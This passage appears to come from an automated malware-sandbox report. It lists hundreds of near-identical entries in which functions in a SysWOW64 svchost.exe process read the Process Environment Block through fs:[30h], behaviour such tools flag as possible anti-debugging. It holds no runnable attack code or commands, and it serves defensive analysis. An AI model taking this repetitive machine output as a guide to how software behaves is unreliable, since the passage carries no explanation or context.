            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h] 1_2_031403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03205227 mov eax, dword ptr fs:[00000030h] 1_2_03205227
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03167208 mov eax, dword ptr fs:[00000030h] 1_2_03167208
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03167208 mov eax, dword ptr fs:[00000030h] 1_2_03167208
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312823B mov eax, dword ptr fs:[00000030h] 1_2_0312823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h] 1_2_0312A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EB256 mov eax, dword ptr fs:[00000030h] 1_2_031EB256
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EB256 mov eax, dword ptr fs:[00000030h] 1_2_031EB256
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03136259 mov eax, dword ptr fs:[00000030h] 1_2_03136259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03129240 mov eax, dword ptr fs:[00000030h] 1_2_03129240
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03129240 mov eax, dword ptr fs:[00000030h] 1_2_03129240
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h] 1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h] 1_2_031B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0316724D mov eax, dword ptr fs:[00000030h] 1_2_0316724D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03159274 mov eax, dword ptr fs:[00000030h] 1_2_03159274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03171270 mov eax, dword ptr fs:[00000030h] 1_2_03171270
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03171270 mov eax, dword ptr fs:[00000030h] 1_2_03171270
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h] 1_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h] 1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h] 1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03134260 mov eax, dword ptr fs:[00000030h] 1_2_03134260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031FD26B mov eax, dword ptr fs:[00000030h] 1_2_031FD26B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031FD26B mov eax, dword ptr fs:[00000030h] 1_2_031FD26B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312826B mov eax, dword ptr fs:[00000030h] 1_2_0312826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0316329E mov eax, dword ptr fs:[00000030h] 1_2_0316329E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0316329E mov eax, dword ptr fs:[00000030h] 1_2_0316329E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h] 1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h] 1_2_0316E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h] 1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h] 1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h] 1_2_031B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03205283 mov eax, dword ptr fs:[00000030h] 1_2_03205283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B92BC mov eax, dword ptr fs:[00000030h] 1_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B92BC mov eax, dword ptr fs:[00000030h] 1_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B92BC mov ecx, dword ptr fs:[00000030h] 1_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B92BC mov ecx, dword ptr fs:[00000030h] 1_2_031B92BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h] 1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h] 1_2_031402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031452A0 mov eax, dword ptr fs:[00000030h] 1_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031452A0 mov eax, dword ptr fs:[00000030h] 1_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031452A0 mov eax, dword ptr fs:[00000030h] 1_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031452A0 mov eax, dword ptr fs:[00000030h] 1_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031F92A6 mov eax, dword ptr fs:[00000030h] 1_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031F92A6 mov eax, dword ptr fs:[00000030h] 1_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031F92A6 mov eax, dword ptr fs:[00000030h] 1_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031F92A6 mov eax, dword ptr fs:[00000030h] 1_2_031F92A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h] 1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h] 1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h] 1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h] 1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h] 1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C72A0 mov eax, dword ptr fs:[00000030h] 1_2_031C72A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C72A0 mov eax, dword ptr fs:[00000030h] 1_2_031C72A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312B2D3 mov eax, dword ptr fs:[00000030h] 1_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312B2D3 mov eax, dword ptr fs:[00000030h] 1_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312B2D3 mov eax, dword ptr fs:[00000030h] 1_2_0312B2D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032052E2 mov eax, dword ptr fs:[00000030h] 1_2_032052E2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315F2D0 mov eax, dword ptr fs:[00000030h] 1_2_0315F2D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315F2D0 mov eax, dword ptr fs:[00000030h] 1_2_0315F2D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h] 1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h] 1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h] 1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h] 1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h] 1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h] 1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0315B2C0 mov eax, dword ptr fs:[00000030h] 1_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031392C5 mov eax, dword ptr fs:[00000030h] 1_2_031392C5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031392C5 mov eax, dword ptr fs:[00000030h] 1_2_031392C5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EF2F8 mov eax, dword ptr fs:[00000030h] 1_2_031EF2F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031292FF mov eax, dword ptr fs:[00000030h] 1_2_031292FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031E12ED mov eax, dword ptr fs:[00000030h] 1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h] 1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h] 1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h] 1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h] 1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h] 1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h] 1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h] 1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h] 1_2_031F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03131131 mov eax, dword ptr fs:[00000030h] 1_2_03131131
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03131131 mov eax, dword ptr fs:[00000030h] 1_2_03131131
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312B136 mov eax, dword ptr fs:[00000030h] 1_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312B136 mov eax, dword ptr fs:[00000030h] 1_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312B136 mov eax, dword ptr fs:[00000030h] 1_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312B136 mov eax, dword ptr fs:[00000030h] 1_2_0312B136
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03160124 mov eax, dword ptr fs:[00000030h] 1_2_03160124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03137152 mov eax, dword ptr fs:[00000030h] 1_2_03137152
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h] 1_2_0312C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h] 1_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03136154 mov eax, dword ptr fs:[00000030h] 1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03136154 mov eax, dword ptr fs:[00000030h] 1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h] 1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h] 1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h] 1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h] 1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h] 1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03129148 mov eax, dword ptr fs:[00000030h] 1_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03129148 mov eax, dword ptr fs:[00000030h] 1_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03129148 mov eax, dword ptr fs:[00000030h] 1_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03129148 mov eax, dword ptr fs:[00000030h] 1_2_03129148
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312F172 mov eax, dword ptr fs:[00000030h] 1_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031C9179 mov eax, dword ptr fs:[00000030h] 1_2_031C9179
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03205152 mov eax, dword ptr fs:[00000030h] 1_2_03205152
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h] 1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h] 1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h] 1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031B019F mov eax, dword ptr fs:[00000030h] 1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h] 1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h] 1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h] 1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03187190 mov eax, dword ptr fs:[00000030h] 1_2_03187190
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03170185 mov eax, dword ptr fs:[00000030h] 1_2_03170185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h] 1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h] 1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0314B1B0 mov eax, dword ptr fs:[00000030h] 1_2_0314B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E11A4 mov eax, dword ptr fs:[00000030h]1_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E11A4 mov eax, dword ptr fs:[00000030h]1_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E11A4 mov eax, dword ptr fs:[00000030h]1_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E11A4 mov eax, dword ptr fs:[00000030h]1_2_031E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]1_2_032061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316D1D0 mov eax, dword ptr fs:[00000030h]1_2_0316D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316D1D0 mov ecx, dword ptr fs:[00000030h]1_2_0316D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D71F9 mov esi, dword ptr fs:[00000030h]1_2_031D71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032051CB mov eax, dword ptr fs:[00000030h]1_2_032051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]1_2_031601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031351ED mov eax, dword ptr fs:[00000030h]1_2_031351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]1_2_031B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F903E mov eax, dword ptr fs:[00000030h]1_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F903E mov eax, dword ptr fs:[00000030h]1_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F903E mov eax, dword ptr fs:[00000030h]1_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F903E mov eax, dword ptr fs:[00000030h]1_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]1_2_0312A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]1_2_0312C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03205060 mov eax, dword ptr fs:[00000030h]1_2_03205060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]1_2_03132050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D705E mov ebx, dword ptr fs:[00000030h]1_2_031D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D705E mov eax, dword ptr fs:[00000030h]1_2_031D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B052 mov eax, dword ptr fs:[00000030h]1_2_0315B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]1_2_031B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov ecx, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
